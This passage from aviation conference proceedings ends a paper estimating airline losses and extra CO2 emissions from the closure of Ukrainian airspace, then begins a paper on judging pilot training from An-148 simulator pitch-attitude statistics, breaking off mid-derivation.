The total number of seats lost during the studied period is just under 1.6 M. This parameter depends both on the size of the airline's fleet and on the regularity of its flights; therefore, the main share fell on the main providers. The available seat-kilometer (ASK) coefficient is also an important indicator for the aviation market, which reflects the total passenger capacity of the company in kilometers. The results of the ASK prediction in the form of a cumulated losses function are presented in Fig. 6. The total ASK losses are a little more than 3 B seat-km.
We also study the parameter of total flight time for each airline. The results of the estimation of the cumulated losses in total flight time by airline are represented in Fig. 7. The total losses in flight time reach 4.7 M hours.
Fig. 6. Cumulated losses in ASK by airline
Fig. 7. Cumulated losses of total flight time
The top fifteen airlines affected by the closure of Ukrainian airspace are presented in Table 1. Based on the traffic analysis, Wizz Air has the largest number of connections; however, its flights are not frequently scheduled, which puts Wizz Air in seventh place by the ASK coefficient. The biggest losses have been detected for Ukraine International Airlines compared to the other operators: Ukraine International Airlines has lost 106 M seat-km over 63 days.

Table 1. Top airlines affected by the closure of Ukrainian airspace

No | Airline | Number of connections | Number of flights per week | Total flights length per week, K NM | Total seat number per week, K | ASK per week, M km seats
1 | Wizz Air | 95 | 159 | 196.70 | 28.10 | 34
2 | Ukraine International Airlines | 92 | 474 | 605.30 | 79.60 | 106.80
3 | Ryanair | 61 | 208 | 344 | 36.40 | 60.20
4 | Sky Up Airlines | 39 | 104 | 286.90 | 17.60 | 48.70
5 | Wind Rose | 36 | 132 | 75.50 | 10.80 | 8
6 | Bees Airline | 20 | 62 | 109.70 | 10.90 | 19.20
7 | Turkish Airlines | 20 | 135 | 157.20 | 38.20 | 43.70
8 | Pegasus Airlines | 16 | 75 | 91.60 | 13.20 | 16.10
9 | Azur Air Ukraine | 15 | 20 | 108.40 | 5.50 | 34
10 | TAP Portugal | 11 | 64 | 77.50 | 10.10 | 12.60
11 | Air Baltic | 8 | 35 | 40.30 | 5 | 5.80
12 | Flydubai | 8 | 44 | 172.60 | 9.20 | 36.20
13 | LOT Polish Airlines | 8 | 48 | 38.50 | 8 | 6.50
14 | CSA Czech Airlines | 6 | 30 | 36.90 | 4.60 | 5.70
15 | Egypt Air | 6 | 40 | 29.40 | 2.90 | 4.20
Other losses are connected with the deviation of flight trajectories from the most efficient ones for every transit flight around the closed airspace. The new trajectories have to avoid the use of the closed airspace volume and are characterized by a much longer length because they run in parallel to the closed airspace boundary line [29]. Based on the geometry of the closed airspace, we can specify two main affected airflows: Europe – Asia and North America – Asia connections. The results of the flight trajectory analysis for the ten most affected flights are presented in Table 2. We compare the efficient and the new trajectories in terms of total length and duration. For example, flights from the northern countries of Europe to Asia have changed significantly: FIN74 on the connection from RJAA to EFHK has to fly an additional 1,899 NM, which increases the flight time by 3 h 11 min. Many airlines operating in the North Atlantic region have changed their trajectories to Pacific ones to support North America – Asia connections.

Significant changes in trajectory length cause additional fuel consumption, which leads to an increase in ticket prices for passengers. From the ecological side, an increase in fuel burn leads to a significant increase in carbon (CO2) emissions into the atmosphere. We use the simplest model of carbon emission prediction for civil aviation: each kilogram of jet fuel burned results in 3.16 kg of CO2 emission [30]. Based on this model, we can easily predict the additional carbon emissions caused by the airplane trajectory modifications; the results for particular flights are presented in Table 3, and a worked example follows Table 2.

Table 2. Flight trajectory analysis for the ten most affected flights

Flight number | Departure airport, ICAO code | Destination airport, ICAO code | Airplane type | Efficient trajectory length, NM | Efficient trajectory duration, HH:mm | New trajectory length, NM | New trajectory duration, HH:mm
FIN74 | RJAA | EFHK | A359 | 5,014 | 9:29 | 6,913 | 12:40
FIN42 | RKSI | EFHK | A359 | 4,589 | 9:02 | 6,637 | 13:56
KAL510 | ESSA | RKSI | B748 | 4,792 | 8:30 | 6,460 | 11:16
KAL908 | EGLL | RKSI | B77W | 5,698 | 10:08 | 6,675 | 13:08
JAL42 | EGLL | RJTT | B789 | 6,220 | 10:53 | 7,759 | 15:33
UAL82 | KEWR | VIDP | B789 | 7,600 | 14:34 | 8,242 | 15:03
KAL94 | KIAD | RKSI | B789 | 7,294 | 13:56 | 7,799 | 15:27
SIA23 | KJFK | WSSS | A359 | 10,488 | 17:15 | 10,730 | 18:55
EVA31 | KJFK | RCTP | B77W | 8,046 | 15:29 | 8,244 | 16:36
CPA829 | CYYZ | VHHH | A350-1000 | 8,283 | 14:53 | 8,609 | 18:02
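The emission estimate can be reproduced in a few lines of Python; the values below are the FIN74 row of Tables 2 and 3, and the burn rate is the one used for that row.

```python
# Reproducing the Table 3 estimate for one flight: additional fuel equals the
# extra trajectory length times the type-specific burn rate, and each kg of
# fuel yields 3.16 kg of CO2 [30].
NM_TO_KM = 1.852
extra_km = (6913 - 5014) * NM_TO_KM          # 1,899 NM of additional length
burn_kg_per_km = 7.07                        # A359 rate from Table 3
extra_fuel_t = extra_km * burn_kg_per_km / 1000
extra_co2_t = extra_fuel_t * 3.16
print(f"extra length {extra_km:.0f} km, "
      f"fuel {extra_fuel_t:.1f} t, CO2 {extra_co2_t:.1f} t")
```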
Table 3. Estimation of additional carbon emissions caused by airplane trajectory modifications

Flight number | Number of seats | Fuel burn, kg/km | Additional length of trajectory, km | Average fuel burn per flight, ton | Average fuel burn per seat, kg | Additional CO2 emission, ton
FIN74 | 315 | 7.07 | 3516.95 | 24.8 | 78.9 | 78.5
FIN42 | 315 | 7.07 | 3792.90 | 26.8 | 85.1 | 84.7
KAL510 | 405 | 10.9 | 3089.14 | 33.6 | 83.1 | 106.4
KAL908 | 368 | 7.88 | 1809.40 | 14.2 | 38.7 | 45.0
JAL42 | 294 | 5.85 | 2850.23 | 16.6 | 56.7 | 52.7
UAL82 | 294 | 5.85 | 1188.98 | 6.9 | 23.6 | 21.9
KAL94 | 294 | 5.85 | 935.26 | 5.8 | 18.6 | 17.3
SIA23 | 315 | 7.07 | 448.18 | 3.1 | 10.0 | 10.0
EVA31 | 368 | 7.88 | 366.70 | 2.8 | 7.85 | 9.13
CPA829 | 369 | 7.07 | 603.75 | 4.3 | 11.5 | 13.5
5 Discussion

The results of the statistical analysis indicate that over 63 days the total losses in trajectory length for scheduled traffic alone reach 16 M km; about 1.6 M seats have not been provided, which results in total ASK losses at a level of 3 B seat-km. The modeled total losses in flight time reach 4.7 M h. The modeled distribution of the cumulated losses by airlines shows a seriously affected air transportation market: the airlines have lost a total of about 411 destinations, corresponding to 1,630 flights each week.

The results of the cost analysis for the selected transit flights around the closed airspace indicate a significant increase in flight time due to the use of trajectories that avoid entering the closed airspace. This also dramatically influences the total cost of a flight and causes additional carbon emissions into the atmosphere: the obtained results indicate that a single one-way flight of FIN74 generates 78.5 tons of additional CO2 emission. The increase in the length of a flight connection is also associated with an increase in the fees connected with the longer usage of particular airspaces and the longer provision of air navigation services. These additional fees also affect the final ticket price for the passenger. Significant changes in flight time require the use of an additional crew for flights longer than 9 h due to the restrictions on pilot work time [31], which also causes additional expenses for an airline.
6 Conclusions

The Russian military invasion of Ukraine has caused the closure of a big part of airspace with a size of about 18 million km2. A cost analysis has been used to estimate the impact of the closed Ukrainian airspace on the operating airlines. The proposed cost accumulation
method estimates the losses of each airline operating in Ukrainian airspace by the parameters of total trajectory length, flight time, available seats, and available seat-kilometers. The obtained distributions of the losses by these parameters as cumulated functions indicate the impact of the war on the airlines operating in the closed airspace. Unfortunately, the proposed method operates with traffic on a scheduled basis only and does not consider charter flights, which are mostly performed on a random basis. However, the application of the proposed method gives the main core of the losses by each parameter, since most passenger and cargo traffic is scheduled. Therefore, missing charter flights is the main disadvantage of the proposed method, but it does not change the obtained results significantly.

Also, the geometry of the closed airspace has been studied for the first time. The obtained results indicate an unfavorable configuration of the closed airspace for flight connections from Asia to Europe and North America. All trajectories for these flight connections have been re-planned. The results of the cost analysis indicate that the length of most of the re-planned trajectories has increased due to the requirement to avoid entering the closed airspace. A simple comparison of the same connection for different trajectories shows a significant increase in the length of the trajectory; for example, for FIN42 it reaches 3,792 km. This causes an additional 26 tons of fuel to be burned and an extra 84.7 tons of carbon emission for only one one-way flight. It also results in increased fees and total flight time for the end user.

The air navigation infrastructure of Ukraine has been seriously damaged. Some time will be required to restore all the air navigation services that are necessary to support civil air traffic.
References

1. Annual Report 2019. The World of Air Transport in 2019. ICAO (2019). https://www.icao.int/annual-report-2019/Pages/the-world-of-air-transport-in-2019.aspx
2. Nizetic, S.: Impact of coronavirus (COVID-19) pandemic on air transport mobility, energy, and environment: a case study. Int. J. Energy Res. 44(13), 10953–10961 (2020)
3. Sun, X., Wandelt, S., Zheng, C., Zhang, A.: COVID-19 pandemic and air transportation: successfully navigating the paper hurricane. J. Air Transp. Manag. 94(1), 102062 (2021). https://doi.org/10.1016/j.jairtraman.2021.102062
4. Chu, A.M., Tiwari, A., So, M.K.: Detecting early signals of COVID-19 global pandemic from network density. J. Travel Med. 27(5), 1–3 (2020). https://doi.org/10.1093/jtm/taaa084
5. IATA annual review (2021). https://www.iata.org/en/publications/annual-review
6. Gudmundsson, S., Cattaneo, M., Redondi, R.: Forecasting recovery time in air transport markets in the presence of large economic shocks: COVID-19. SSRN, pp. 1–17 (2020). https://doi.org/10.2139/ssrn.3623040
7. Effects of Novel Coronavirus (COVID-19) on Civil Aviation: Economic Impact Analysis. Economic Development – Air Transport Bureau. ICAO Uniting Aviation (2022). https://www.icao.int/sustainability/Pages/Economic-Impacts-of-COVID-19.aspx
8. Conflict Zone Information Bulletin. CZIB-2022-01R03, EASA (2022). https://www.easa.europa.eu/domains/air-operations/czibs/czib-2022-01r03
9. Aeronautical Information Publication (AIP) of Ukraine. Ukrainian State Air Traffic Services Enterprise (2019)
10. LSSIP 2021 – Ukraine Local Single Sky Implementation. Eurocontrol (2022)
Impact of Closed Ukrainian Airspace
63
11. Volosyuk, V., et al.: Optimal method for polarization selection of stationary objects against the background of the Earth’s surface. Int. J. Electron. Telecommun. 68(1), 83–89 (2022). https://doi.org/10.24425/ijet.2022.139852 12. Zhyla, S., et al.: Statistical synthesis of aerospace radars structure with optimal spatio-temporal signal processing, extended observation area and high spatial resolution. Radioelectron. Comput. Syst. 1, 178–194 (2022). https://doi.org/10.32620/reks.2022.1.14 13. Ostroumov, I.V., Marais, K., Kuzmenko, N.S.: Aircraft positioning using multiple distance measurements and spline prediction. Aviation 26(1), 1 (2022). https://doi.org/10.3846/avi ation.2022.16589 14. Ostroumov, I.V., Kuzmenko, N.S.: Configuration analysis of European navigational aids network. In: Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1–9 (2021). https://doi.org/10.1109/ICNS54818.2022.9771515 15. Solomentsev, O., Zaliskyi, M., Herasymenko, T., Kozhokhina, O., Petrova, Y.: Efficiency of operational data processing for radio electronic equipment. Aviation 23(3), 71–77 (2019). https://doi.org/10.3846/aviation.2019.11849 16. Solomentsev, O., Zaliskyi, M., Nemyrovets, Yu., Asanov, M.: Signal processing in case of radio equipment technical state deterioration. In: Signal Processing Symposium 2015 (SPS 2015), pp. 1–5 (2015). https://doi.org/10.1109/SPS.2015.7168312 17. Solomentsev, O., Zaliskyi, M.: Correlated failures analysis in navigation system. In: IEEE 5th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 41–44 (2018). https://doi.org/10.1109/MSNMC.2018.8576306 18. Russian attacks and troop locations. Ministry of Defense. United Kingdom. https://mobile.twi tter.com/DefenceHQ/status/1508774299058020357?cxt=HHwWioC92eWOn_ApAAAA 19. Ostroumov, I.V., Kuzmenko, N.S.: Accuracy assessment of aircraft positioning by multiple Radio Navigational aids. Telecommun. Radio Eng. 77(8), 705–715 (2018). https://doi.org/ 10.1615/TelecomRadEng.v77.i8.40 20. Ostroumov, I.V., Kuzmenko, N.S.: Accuracy improvement of VOR/VOR navigation with angle extrapolation by linear regression. Telecommun. Radio Eng. 78(15), 1399–1412 (2019). https://doi.org/10.1615/TelecomRadEng.v78.i15.90 21. Ruzhentsev, N., et al.: Radio-heat contrasts of UAVs and their weather variability at 12 GHz, 20 GHz, 34 GHz, and 94 GHz frequencies. ECTI Trans. Electr. Eng. Electron. Commun. 20(2), 1–9 (2022) 22. Gnatyuk, S.: Critical aviation information systems cybersecurity. In: Meeting Security Challenges through Data Analytics and Decision Support, NATO Science for Peace and Security Series - D: Information and Communication Security, vol. 47, no. 3, pp. 308–316. IOS Press Ebooks (2016) 23. Gnatyuk, S., Akhmetov, B., Kozlovskyi, V., Kinzeryavyy, V., Aleksander, M., Prysiazhnyi, D.: New secure block cipher for critical applications: design, implementation, speed and security analysis. In: Hu, Z., Petoukhov, S., He, M. (eds.) AIMEE 2019. AISC, vol. 1126, pp. 93–104. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-39162-1_9 24. Ostroumov, I.V., Kuzmenko, N.S.: Statistical analysis and flight route extraction from automatic dependent surveillance-broadcast data. In: Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1–9 (2022). https://doi.org/10.1109/ICNS54818.2022. 9771515 25. Sun, J., Ellerbroek, J., Hoekstra, J.: Flight extraction and phase identification for large automatic dependent surveillance–broadcast datasets. J. Aerosp. Inf. 
Syst. 14(10), 566–572 (2017) 26. FlightAware. https://flightaware.com 27. Zaliskyi, M., Petrova, Y., Asanov, M., Bekirov, E.: Statistical data processing during wind generators operation. Int. J. Electr. Electron. Eng. Telecommun. 8(1), 33–38 (2019). https:// doi.org/10.18178/ijeetc.8.1.33-38
64
O. Ivashchuk and I. Ostroumov
28. Solomentsev, O., et al.: Method of optimal threshold calculation in case of radio equipment maintenance. In: Shukla, S., Gao, X.Z., Kureethara, J.V., Mishra, D. (eds.) Data Science and Security. LNNS, vol. 462, pp. 69–79. Springer, Singapore (2022). https://doi.org/10.1007/ 978-981-19-2211-4_6 29. Havrylenko, O., et al.: Decision support system based on the ELECTRE method. In: Shukla, S., Gao, X.Z., Kureethara, J.V., Mishra, D. (eds.) Data Science and Security. LNNS, vol. 462, pp. 295–304. Springer, Singapore (2022). https://doi.org/10.1007/978-981-19-2211-4_26 30. Seymour, K., Held, M., Georges, G., Boulouchos, K.: Fuel estimation in air transportation: modeling global fuel consumption for commercial aviation. Transp. Res. Part D: Transp. Environ. 88, 102528 (2020) 31. EASA FTL Regulations Combined Document. UK Civil Aviation Authority (2014)
Analysis of Approach Attitude for the Evaluation of the Quality of Pilot Training
Yurii Hryshchenko1(B), Victor Romanenko1, Maksym Zaliskyi1, and Tetiana Fursenko2
1 National Aviation University, Kyiv, Ukraine
[email protected]
2 Kyiv National Economic University named after Vadym Hetman, Kyiv, Ukraine
Abstract. The paper concentrates on the ergatic aircraft control system. It examines the issue of assessing the quality of pilot training based on the analysis of changes in aircraft flight parameters. In particular, the authors focus on approach attitude. The pitch attitude is treated as a random variable. The initial data for the research are obtained on the An-148 full flight simulator with and without failures. Relying on these data, we find the laws of distribution of a random variable in flights without failures and with complex failures and analyze the pitch attitude autospectra. Based on the obtained information, we assess the quality of pilot training. In addition, the authors synthesize an algorithm for detecting the presence of components indicating complex failures in pitch attitude trends. For a comparative assessment, the algorithm is implemented on the basis of the Neyman-Pearson criterion, as well as the optimal Bayesian criterion.
Keywords: Deterministic fluctuations · random process · quality of piloting technique · detector · human factor
1 Introduction
Landing is the final and most difficult flight phase. This is because, at this time, the aircraft crew has the most intensive workload, and the flight is performed at low altitude and low speed. The aircraft landing process begins with a pre-landing maneuver: descent and entry into the aerodrome zone. It is carried out using radio aids. In the vicinity of the aerodrome, the aircraft performs several turn maneuvers and then descends until landing. After touchdown, the aircraft makes a braking roll until it comes to a complete stop. During the approach phase, at an altitude of 300–400 m, the landing gear is lowered; then, at an altitude of 150–200 m, the flaps are extended and the engine thrust is reduced. The aircraft descends along the glide path to the go-around altitude (60 m).
The horizontal projection of the aircraft landing path from the height of the conditional obstacle (15 m) to a complete stop is called the landing distance. The landing distance consists of the following stages: descent (gliding), flare, holding-off, landing (touchdown), and the after-landing roll to a complete stop. At the gliding stage, the aircraft descends at a vertical speed of 5–8 m/s. At the flare stage, the aircraft is moved from an angular position to a horizontal one. At the same time, the angle of attack and the lift coefficient increase while the speed is reduced. The flare ends at an altitude of 0.5–1 m. At the end of the flare, the aircraft still has a sufficiently high airspeed, at which landing is difficult and dangerous. Holding-off is performed to reduce the speed. At this stage, under the action of the drag force, the aircraft decelerates. As the speed decreases, the angle of attack is increased to its landing value to maintain altitude. At a certain speed, the lift force no longer supports the weight of the aircraft, and it touches the ground. Thus, flight execution at the landing stage demands from pilots a certain skill and coherent interaction.
2 Materials and Methods
2.1 Analysis of Flight Simulators
Aviation simulators are widely used in modern civil and military aviation. The aims of simulators are pilot training and maintaining and improving pilots' qualification level. Flight simulation can also be used to train maintenance engineers and during the design of an aircraft and its systems.
The aviation simulator imitates the flight of the aircraft. The dynamics of the flight is simulated based on special mathematical models, according to which the aircraft flies. The simulator takes into account the behavior of the control elements during movement and the effect of external influences on the aircraft, such as air density and turbulence and the presence of clouds and precipitation. In addition, the operation of all systems of a specific aircraft model is also simulated.
Depending on the purpose of the flight simulator, different degrees of complexity of flight simulation are considered. This requires appropriate hardware and detailed models with varying degrees of realism. In the simplest version, a desktop computer with simulated aircraft systems can be considered a flight simulator [1]. The most complex flight simulators are Full Flight Simulators (FFS). The FFS is a cockpit with working controls, instruments, and other cabin devices that allows complex simulations in combination with visual systems with a wide field of view. As a rule, such cockpits are installed on a motion system with six degrees of freedom in order to respond to each external influence and to each movement of the pilot during flight simulation [2].
Consider the main types of flight simulators.
1. Cockpit Procedures Trainer (CPT) is used to practice actions in emergency situations or to study the arrangement of the cockpit.
2. Aviation Training Device (ATD) is used for basic flight training.
3. Basic Instrument Training Device (BITD) is used to practice general flight procedures.
4. Flight and Navigation Procedures Trainer (FNPT) is used for general flight training.
5. Flight Training Device (FTD) is used for both general and special flight training.
6. Complex Simulator (Full Flight Simulator) is used for training on aircraft of a specific type, in accordance with the rules of the International Civil Aviation Organization (ICAO) [3].
The complex simulator of the An-148 aircraft has a first-class visualization system and a mobile cabin. The equipment can simulate any conditions of aircraft operation, including emergency situations, for example, failure of one or another system or control, and landing in difficult weather conditions. The FFS of the An-148 is intended for training the crew in ground conditions and for obtaining practical skills: a) in piloting and aircraft control; b) in the operation of the functional systems of the aircraft; c) in actions both in normal flight conditions and in case of failures of functional systems and in other special cases of flight; d) in the rational distribution of duties and interaction within the crew, and in maintaining communication between crew members.
The flight simulator provides for solving the following tasks:
1) pre-flight training in the crew cabin (including checks of all functional systems, startup and testing of the auxiliary power system and engines using airfield and on-board power sources, and the work of each crew member in accordance with the checklists);
2) starting and taxiing on the runway, checking the performance of braking devices, practicing preliminary and executive lineup with visual orientation;
3) take-off with visual orientation, including in ICAO Category 1 conditions;
4) instrument climb to the maximum horizontal flight altitude;
5) flight along the route using on-board radio equipment in automatic and manual flight control modes;
6) descent from flight level to circuit altitude with and without the use of the autopilot, including emergency descent;
7) approach to landing (using manual or automatic control), go-around, and landing, both by instruments and with visual orientation, including in ICAO Category 1 landing minimums;
8) take-off and roll in wind from any direction, braking with and without thrust reverser, taxiing with ±180° turns along the runway;
9) actions in the event of failure of the functional systems of the aircraft, dangerous external influences, and other special cases of flight provided for by the flight instructions and the aircraft technical operation manual.
Parametric flight information can be written to external media for further processing.
The goal of this paper is to improve the quality of the aircraft ergatic control system at the glide path entrance. The analysis of the airplane-handling style according to
flight parameters on the full flight simulator, with environmental influence turned off, shows that each pilot has an individual style. The random functions of the changing roll and pitch flight parameters in flight can be identified as those peculiar to a particular pilot. The presence of a deterministic component indicates a breakdown of the airplane-handling style when a pilot is exposed to negative factors. Therefore, its identification is very important. In the case of an approach with an engaged autothrottle, these are the main analog parameters for controlling an aircraft in the director mode.
As found in previous studies on the An-148 full flight simulator, without failures or with a single failure, the statistical distribution of such an important parameter as the bank angle does not contradict the normal distribution law [4]. In the case of more than two serious failures occurring simultaneously, the statistical distribution of the bank angle does not contradict the generalized Weibull distribution. In such "flights" the quality of the piloting technique deteriorates. The level of the pilot's psychophysiological tension increases. Cases when flight parameters exceed the acceptable values become more frequent. These standards are established in the flight manual for an aircraft of the given type.
The two considered algorithms, based on the Neyman-Pearson and the optimal Bayesian criteria, make it possible to declare the presence of a deterministic sinusoidal component of the bank angle in a given "flight" on the full flight simulator. Now it is necessary to check for the presence of a deterministic component in simple and complex flights by the pitch attitude.
It should be pointed out that the problem of the human factor is considered by many authors, and ICAO circulars pay attention to this problem [5–16]. At the modern stage of aviation industry development, the percentage of aviation accidents attributable to the human factor is 80–90%. Although such events have a very small probability, the problem of preparing personnel for special flight situations cannot be ignored. Taking into account all erroneous actions of aviation personnel is an important process in achieving a high level of aviation safety.
The elimination of erroneous actions of aviation personnel can be pursued in many ways. One of them is training operators to counteract a large load of factors during anti-stress training in order to improve their psychophysical qualities. Accounting for the psychophysiological properties of a person in the training of operators is one of the most important factors in improving aviation safety, reliability, and labor efficiency, and in reducing the number of aviation accidents.
An operator approaching the informational boundaries with increased psychophysiological tension produces an increase in the amplitudes of the aircraft's flight parameters. The change in the piloting style, which is monitored according to the flight parameters, subsequently leads to a multiple increase in such a parameter as approach attitude. This can result in a loss of aircraft lift or an unacceptable airspeed. A person without active counteraction to negative factors (on the FFS, failures introduced by the operator) quickly loses concentration and makes mistakes.
The suddenness of the occurrence of such information boundaries, leading to enormous risk and uncertainty, is what leads pilots to an aviation event if they are not
trained for such countermeasures. At the same time, every operator has his own informational limit, which depends on training and his psychophysiological qualities. Pushing this limit and expanding the capabilities of the operator is the main task of FFS training. The instructor staff should be provided with information on the presence of a deterministic component of the flight parameter in the form of comparative coefficients for flights without failures and with failures according to the Neyman-Pearson and Bayes criteria.
When working on the FFS, it is necessary to include in the data processing system the synthesis of two algorithms for detecting increased psychophysiological tension of the pilot in the event of complex failures. Such a procedure can be implemented by extracting a deterministic component from the random process of the changing flight parameter to evaluate the characteristics of the ergatic aircraft control system. In addition, it is necessary to have a database of crew training according to the method presented above and to respond in a timely manner to deterioration in the quality of piloting technique. In a real flight, it is also advisable to have such a warning system about deterioration in the quality of piloting technique. However, this requires a lot of time and coordination of this procedure with a large number of aviation services.
2.2 Methods for Detecting Complex Failures
High pitch attitudes related to the pilot's psychophysiological state affect the quality of flight in the horizontal plane. Let us analyze the quality of flight in the horizontal plane by the pitch in real flight from the end of the turn onto the downwind leg (excluding turns) to landing (Table 1, Fig. 1). Table 1 contains the following notations: i is the measurement number, ϑi is the result of the i-th measurement. The analysis of autocorrelation functions and their spectra indicates a good quality of the piloting technique in real flight [17, 18].
Table 1. Initial data
i    Angle, ϑi   i    Angle, ϑi   i    Angle, ϑi   i    Angle, ϑi   i    Angle, ϑi
1    3           11   1.5         21   3.5         31   4           41   3
2    −6          12   −1          22   5           32   6           42   −5
3    3.5         13   2.5         23   0           33   0           43   1
4    −1          14   6           24   4.6         34   −1          44   0
5    4.5         15   11          25   2.2         35   4           45   −1
6    0           16   14          26   4.7         36   4           46   −3
7    3           17   3.5         27   −0.5        37   6           47   −4
8    −9          18   7.5         28   2.5         38   7.5         48   5
9    2           19   3.4         29   0.2         39   0           49   4
10   −2.5        20   5.2         30   −1          40   8           50   −2
We construct the histogram of the approach attitude distribution on final approach, after the turn onto the downwind leg to landing, and choose the corresponding predicted distribution (Fig. 2). As can be seen from the calculations in Fig. 2, the measurement statistics do not contradict the hypothesis of their normal distribution with a confidence coefficient of 0.7.
We now analyze flights with complex failures, n ≥ 3. In this case, there are failures of the second (right) engine and of the second and fourth channels of the fly-by-wire controls (FBWCs), as well as a loss of control of the right aileron. To simplify the selection of the predicted distribution, we change the signs of the pitch attitude amplitudes. The analyzed data are shown in Table 2 and Fig. 3.
Table 2. Initial data
i    Angle, ϑi   i    Angle, ϑi   i    Angle, ϑi   i    Angle, ϑi
1    9           11   1           21   −3          31   −1
2    14          12   9           22   −2          32   2
3    2.5         13   4.5         23   0           33   0
4    −5          14   −2          24   2.5         34   3.5
5    2           15   −3.5        25   4           35   0
6    10          16   −2          26   0           36   3.5
7    1           17   −1.5        27   −0.5        37   3
8    2.5         18   −2.5        28   1           38   0
9    −2.5        19   −6          29   0           39   10
10   2.5         20   −4.5        30   −2.5        40   7.5
Based on the calculations for the generalized Weibull distribution, we obtain the value of the goodness-of-fit test parameter χ2 = 0.627, then P ≈ 0.68. Since this probability is large enough, the hypothesis of the generalized Weibull distribution can be declared as not contradicting the experimental data.
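The same χ² machinery underlies the checks in Figs. 2 and 3. As an assumption-level illustration (the paper's listings are in Mathcad, and the bin count here is an arbitrary choice), the following Python sketch applies it to the Table 1 no-failure samples against the normal law:

```python
import numpy as np
from scipy import stats

# Pitch attitude samples from Table 1 (real flight, no failures), i = 1..50.
theta = np.array([3, -6, 3.5, -1, 4.5, 0, 3, -9, 2, -2.5,
                  1.5, -1, 2.5, 6, 11, 14, 3.5, 7.5, 3.4, 5.2,
                  3.5, 5, 0, 4.6, 2.2, 4.7, -0.5, 2.5, 0.2, -1,
                  4, 6, 0, -1, 4, 4, 6, 7.5, 0, 8,
                  3, -5, 1, 0, -1, -3, -4, 5, 4, -2])

counts, edges = np.histogram(theta, bins=6)        # observed bin counts
mu, s = theta.mean(), theta.std(ddof=1)            # fitted normal parameters
expected = len(theta) * np.diff(stats.norm.cdf(edges, mu, s))
expected *= counts.sum() / expected.sum()          # renormalize truncated tails
chi2 = np.sum((counts - expected) ** 2 / expected)
p_value = stats.chi2.sf(chi2, df=len(counts) - 3)  # 2 parameters estimated
print(f"chi2 = {chi2:.3f}, P = {p_value:.3f}")
```

A large P-value means the normal hypothesis is not contradicted, mirroring the conclusion drawn from Fig. 2.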
Fig. 1. Calculation listing of the pitch attitude autospectrum, normalized (norm = 4.453) and unnormalized (unnorm = 68.77)
Fig. 2. Listing of constructing a histogram for pitch attitude values (ϑ), its approximation by the Gaussian law and the conformance check of the predicted normal distribution to the statistical one by the criterion of the goodness-of-fit test χ2
It should be noted that these failures make it difficult to control the aircraft. This is due to the control system and the influence of aerodynamic forces. However, when "flying" with these failures alone, or in combination with other failures, the distribution law is no longer normal. This indicates an increase in the pilot's psychophysiological tension and the need for training "flights" on the FFS to learn how to counteract an increase in the amplitude of aircraft parameters (IAAP).
Fig. 3. Listing of constructing a histogram for pitch attitude values (ϑ), its approximation by the Gaussian law and the conformance check of the predicted normal distribution to the statistical one by the criterion of the goodness-of-fit test χ2 in case of flight with complex failures n ≥ 3
Let us synthesize algorithms for detecting the presence of components in the pitch attitude trends that indicate complex failures and possible further severe flight difficulties. Suppose that there is a hypothesis H0 (no flight difficulties) and an alternative H1 (there are difficulties). In general, for H0, the probability density function of the pitch attitude is that of a Gaussian random variable, and for H1, this probability density function has the form of the generalized Weibull distribution. Solving the detection problem directly in this setting would complicate the mathematical calculations, so we make the following simplification. Based on the analysis of the form of the pitch attitude parameter in case of flight difficulties, we put forward the assumption that in case of complex failures the parameter changes as an additive combination of two components: Gaussian noise and a harmonic oscillation. Then a sign of complex failures is the presence of a sinusoidal signal in the mixture.
To test the possibility of using such a detector, let us simulate the initial signals. We first simulate a normal situation without failures. This situation corresponds to normal noise with expected value m = 1.413, standard deviation σ = 4.407, and sample size N = 50. After that, we simulate a flight in difficult conditions, in which the human operator's psychophysiological tension is manifested. In this case, we use a discrete sinusoid as the information signal Si, with amplitude U = 2, period T = 6, and zero initial phase. The implementation of the signal in the absence of failures is shown in Fig. 4a, and in the presence of failures in Fig. 4b.
Fig. 4. Simulation graph of a random function of a parameter in flight without failures (a) and with failures (b)
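A minimal Python sketch of this simulation (cf. Fig. 4) under the parameters just given — an illustration only, since the paper's modeling was performed in Mathcad:

```python
import numpy as np

m, sigma, N = 1.413, 4.407, 50        # expected value, standard deviation, sample size
U, T = 2.0, 6.0                       # amplitude and period of the information signal

i = np.arange(N)
S = U * np.sin(2 * np.pi * i / T)     # discrete sinusoid with zero initial phase

rng = np.random.default_rng(seed=1)   # fixed seed, for reproducibility only
x_no_failures = rng.normal(m, sigma, N)   # Fig. 4a: Gaussian noise only
x_failures = x_no_failures + S            # Fig. 4b: noise plus sinusoid
```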
Let us synthesize the signal detection algorithm mathematically, using the results presented in [19–34]. For the assumptions made, the detection problem is reduced to testing the simple hypothesis $H_0$, that the sample implementation is described by a multivariate Gaussian distribution, versus the simple alternative $H_1$, that the sample implementation contains a useful sinusoidal signal. In this case, the sample counts are considered to be independent random variables. Then
$$f(x_1, x_2, \ldots, x_N \mid H_0) = \frac{1}{\left(\sigma\sqrt{2\pi}\right)^N} e^{-\frac{\sum_{i=1}^{N}(x_i - \bar{x})^2}{2\sigma^2}}, \qquad (1)$$
$$f(x_1, x_2, \ldots, x_N \mid H_1) = \frac{1}{\left(\sigma\sqrt{2\pi}\right)^N} e^{-\frac{\sum_{i=1}^{N}(x_i - \bar{x} - S_i)^2}{2\sigma^2}}, \qquad (2)$$
where $\sigma$ is the standard deviation, and $S_i$ are the known samples of the sinusoidal signal. The parameters $\bar{x}$ and $\sigma$ are considered known; they can be determined from observations of the process in the absence of failures. The likelihood ratio determining the decision statistic is found by the formula
$$l(x_1, x_2, \ldots, x_N) = \frac{f(x_1, x_2, \ldots, x_N \mid H_1)}{f(x_1, x_2, \ldots, x_N \mid H_0)}. \qquad (3)$$
As a result, we get
$$l(x_1, x_2, \ldots, x_N) = e^{\frac{-\sum_{i=1}^{N}(x_i - \bar{x} - S_i)^2 + \sum_{i=1}^{N}(x_i - \bar{x})^2}{2\sigma^2}}. \qquad (4)$$
To simplify the mathematical calculations, we use the log-likelihood ratio; then
$$\ln l(x_1, x_2, \ldots, x_N) = \ln e^{\frac{-\sum_{i=1}^{N}(x_i - \bar{x} - S_i)^2 + \sum_{i=1}^{N}(x_i - \bar{x})^2}{2\sigma^2}} = \frac{\sum_{i=1}^{N}\left(2S_i(x_i - \bar{x}) - S_i^2\right)}{2\sigma^2}. \qquad (5)$$
Consequently, we get
